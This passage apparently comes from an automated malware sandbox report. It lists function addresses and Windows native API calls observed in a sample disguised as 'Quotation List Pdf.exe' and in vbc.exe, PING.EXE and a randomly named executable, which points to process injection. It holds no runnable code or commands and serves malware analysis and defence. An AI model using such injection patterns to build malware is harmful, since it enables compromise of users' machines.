            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038835C0 NtCreateMutant,LdrInitializeThunk,7_2_038835C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882B60 NtClose,LdrInitializeThunk,7_2_03882B60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882AD0 NtReadFile,LdrInitializeThunk,7_2_03882AD0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882AF0 NtWriteFile,LdrInitializeThunk,7_2_03882AF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038839B0 NtGetContextThread,LdrInitializeThunk,7_2_038839B0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882FB0 NtResumeThread,LdrInitializeThunk,7_2_03882FB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882FE0 NtCreateFile,LdrInitializeThunk,7_2_03882FE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882F30 NtCreateSection,LdrInitializeThunk,7_2_03882F30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03882EE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882DD0 NtDelayExecution,LdrInitializeThunk,7_2_03882DD0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03882DF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03882D10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03882D30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03882CA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882C60 NtCreateKey,LdrInitializeThunk,7_2_03882C60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03882C70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03883090 NtSetValueKey,7_2_03883090
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03883010 NtOpenDirectoryObject,7_2_03883010
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882B80 NtQueryInformationFile,7_2_03882B80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882BA0 NtEnumerateValueKey,7_2_03882BA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882BE0 NtQueryValueKey,7_2_03882BE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882BF0 NtAllocateVirtualMemory,7_2_03882BF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882AB0 NtWaitForSingleObject,7_2_03882AB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882F90 NtProtectVirtualMemory,7_2_03882F90
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882FA0 NtQuerySection,7_2_03882FA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882F60 NtCreateProcessEx,7_2_03882F60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882E80 NtReadVirtualMemory,7_2_03882E80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882EA0 NtAdjustPrivilegesToken,7_2_03882EA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882E30 NtWriteVirtualMemory,7_2_03882E30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882DB0 NtEnumerateKey,7_2_03882DB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882D00 NtSetInformationFile,7_2_03882D00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03883D10 NtOpenProcessToken,7_2_03883D10
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03883D70 NtOpenThread,7_2_03883D70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882CC0 NtQueryVirtualMemory,7_2_03882CC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882CF0 NtOpenProcess,7_2_03882CF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03882C00 NtQueryInformationProcess,7_2_03882C00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A8000 NtClose,7_2_030A8000
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A7F60 NtDeleteFile,7_2_030A7F60
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A7E70 NtReadFile,7_2_030A7E70
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030A7D10 NtCreateFile,7_2_030A7D10
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684621B00_2_00007FF7684621B0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684638B00_2_00007FF7684638B0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684431300_2_00007FF768443130
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684481F00_2_00007FF7684481F0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684631E00_2_00007FF7684631E0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684671B00_2_00007FF7684671B0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684629B00_2_00007FF7684629B0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684339D00_2_00007FF7684339D0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768449A900_2_00007FF768449A90
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768464B100_2_00007FF768464B10
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684502A00_2_00007FF7684502A0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684382D00_2_00007FF7684382D0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684654900_2_00007FF768465490
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768456C900_2_00007FF768456C90
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76845BC800_2_00007FF76845BC80
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768451D600_2_00007FF768451D60
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76844D6200_2_00007FF76844D620
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768443EF00_2_00007FF768443EF0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76843B6F00_2_00007FF76843B6F0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768436ED00_2_00007FF768436ED0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76843BF900_2_00007FF76843BF90
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684E7F400_2_00007FF7684E7F40
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684667E00_2_00007FF7684667E0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684517B40_2_00007FF7684517B4
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76845C7D00_2_00007FF76845C7D0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684420800_2_00007FF768442080
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76846E8E00_2_00007FF76846E8E0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76845C0A00_2_00007FF76845C0A0
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF7684658C00_2_00007FF7684658C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040E0635_2_0040E063
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004030905_2_00403090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040226E5_2_0040226E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004022705_2_00402270
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00402B4B5_2_00402B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00402B505_2_00402B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004024CD5_2_004024CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004024D05_2_004024D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040FDC35_2_0040FDC3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040FDBA5_2_0040FDBA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004167535_2_00416753
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0042D7735_2_0042D773
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004027105_2_00402710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040FFE35_2_0040FFE3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E05915_2_058E0591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BD5B05_2_058BD5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058205355_2_05820535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D75715_2_058D7571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CE4F65_2_058CE4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DF43F5_2_058DF43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D24465_2_058D2446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058114605_2_05811460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DF7B05_2_058DF7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581C7C05_2_0581C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058447505_2_05844750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058207705_2_05820770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D16CC5_2_058D16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583C6E05_2_0583C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E01AA5_2_058E01AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582B1B05_2_0582B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D81CC5_2_058D81CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058101005_2_05810100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BA1185_2_058BA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EB16B5_2_058EB16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0585516C5_2_0585516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F1725_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CF0CC5_2_058CF0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C05_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D70E95_2_058D70E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DF0E05_2_058DF0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0586739A5_2_0586739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E03E65_2_058E03E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582E3F05_2_0582E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D132D5_2_058D132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580D34C5_2_0580D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DA3525_2_058DA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058252A05_2_058252A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583B2C05_2_0583B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C12ED5_2_058C12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C02745_2_058C0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05838DBF5_2_05838DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583FDC05_2_0583FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581ADE05_2_0581ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582AD005_2_0582AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05823D405_2_05823D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D1D5A5_2_058D1D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D7D735_2_058D7D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C0CB55_2_058C0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05810CF25_2_05810CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DFCF25_2_058DFCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820C005_2_05820C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05899C325_2_05899C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821F925_2_05821F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DFFB15_2_058DFFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05812FC85_2_05812FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582CFE05_2_0582CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DFF095_2_058DFF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05862F285_2_05862F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05840F305_2_05840F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05894F405_2_05894F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05832E905_2_05832E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DCE935_2_058DCE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05829EB05_2_05829EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DEEDB5_2_058DEEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DEE265_2_058DEE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05820E595_2_05820E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058229A05_2_058229A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058EA9A65_2_058EA9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058299505_2_05829950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583B9505_2_0583B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058369625_2_05836962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058068B85_2_058068B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058238E05_2_058238E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584E8F05_2_0584E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058228405_2_05822840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582A8405_2_0582A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583FB805_2_0583FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D6BD75_2_058D6BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0585DBF95_2_0585DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DAB405_2_058DAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DFB765_2_058DFB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581EA805_2_0581EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05865AA05_2_05865AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BDAAC5_2_058BDAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CDAC65_2_058CDAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058DFA495_2_058DFA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D7A465_2_058D7A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05893A6C5_2_05893A6C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D0FD36_2_043D0FD3
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D0FCA6_2_043D0FCA
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D79636_2_043D7963
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043EE9836_2_043EE983
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043D11F36_2_043D11F3
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeCode function: 6_2_043CF2736_2_043CF273
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0389739A7_2_0389739A
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0385E3F07_2_0385E3F0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_039103E67_2_039103E6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390132D7_2_0390132D
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390A3527_2_0390A352
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0383D34C7_2_0383D34C
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038552A07_2_038552A0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0386B2C07_2_0386B2C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038F12ED7_2_038F12ED
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038F02747_2_038F0274
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0385B1B07_2_0385B1B0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_039101AA7_2_039101AA
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_039081CC7_2_039081CC
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038401007_2_03840100
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038EA1187_2_038EA118
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0388516C7_2_0388516C
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0383F1727_2_0383F172
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0391B16B7_2_0391B16B
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038FF0CC7_2_038FF0CC
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038570C07_2_038570C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390F0E07_2_0390F0E0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_039070E97_2_039070E9
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390F7B07_2_0390F7B0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0384C7C07_2_0384C7C0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038747507_2_03874750
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038507707_2_03850770
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_039016CC7_2_039016CC
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0386C6E07_2_0386C6E0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_039105917_2_03910591
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038ED5B07_2_038ED5B0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038505357_2_03850535
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_039075717_2_03907571
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038FE4F67_2_038FE4F6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390F43F7_2_0390F43F
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_039024467_2_03902446
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038414607_2_03841460
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03819B807_2_03819B80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0386FB807_2_0386FB80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03906BD77_2_03906BD7
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0388DBF97_2_0388DBF9
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390AB407_2_0390AB40
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390FB767_2_0390FB76
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0384EA807_2_0384EA80
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038EDAAC7_2_038EDAAC
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03895AA07_2_03895AA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038FDAC67_2_038FDAC6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03907A467_2_03907A46
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390FA497_2_0390FA49
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038C3A6C7_2_038C3A6C
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038529A07_2_038529A0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0391A9A67_2_0391A9A6
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038599507_2_03859950
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0386B9507_2_0386B950
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038669627_2_03866962
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038368B87_2_038368B8
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038538E07_2_038538E0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0387E8F07_2_0387E8F0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038528407_2_03852840
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0385A8407_2_0385A840
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03851F927_2_03851F92
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390FFB17_2_0390FFB1
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03842FC87_2_03842FC8
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03813FD27_2_03813FD2
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03813FD57_2_03813FD5
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0385CFE07_2_0385CFE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390FF097_2_0390FF09
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03892F287_2_03892F28
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03870F307_2_03870F30
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038C4F407_2_038C4F40
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390CE937_2_0390CE93
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03862E907_2_03862E90
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03859EB07_2_03859EB0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390EEDB7_2_0390EEDB
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390EE267_2_0390EE26
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03850E597_2_03850E59
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03868DBF7_2_03868DBF
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0386FDC07_2_0386FDC0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0384ADE07_2_0384ADE0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0385AD007_2_0385AD00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03853D407_2_03853D40
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03901D5A7_2_03901D5A
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03907D737_2_03907D73
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038F0CB57_2_038F0CB5
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0390FCF27_2_0390FCF2
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03840CF27_2_03840CF2
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03850C007_2_03850C00
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_038C9C327_2_038C9C32
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030918D07_2_030918D0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030934307_2_03093430
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_030AA4507_2_030AA450
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0308CA977_2_0308CA97
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0308CAA07_2_0308CAA0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0308AD407_2_0308AD40
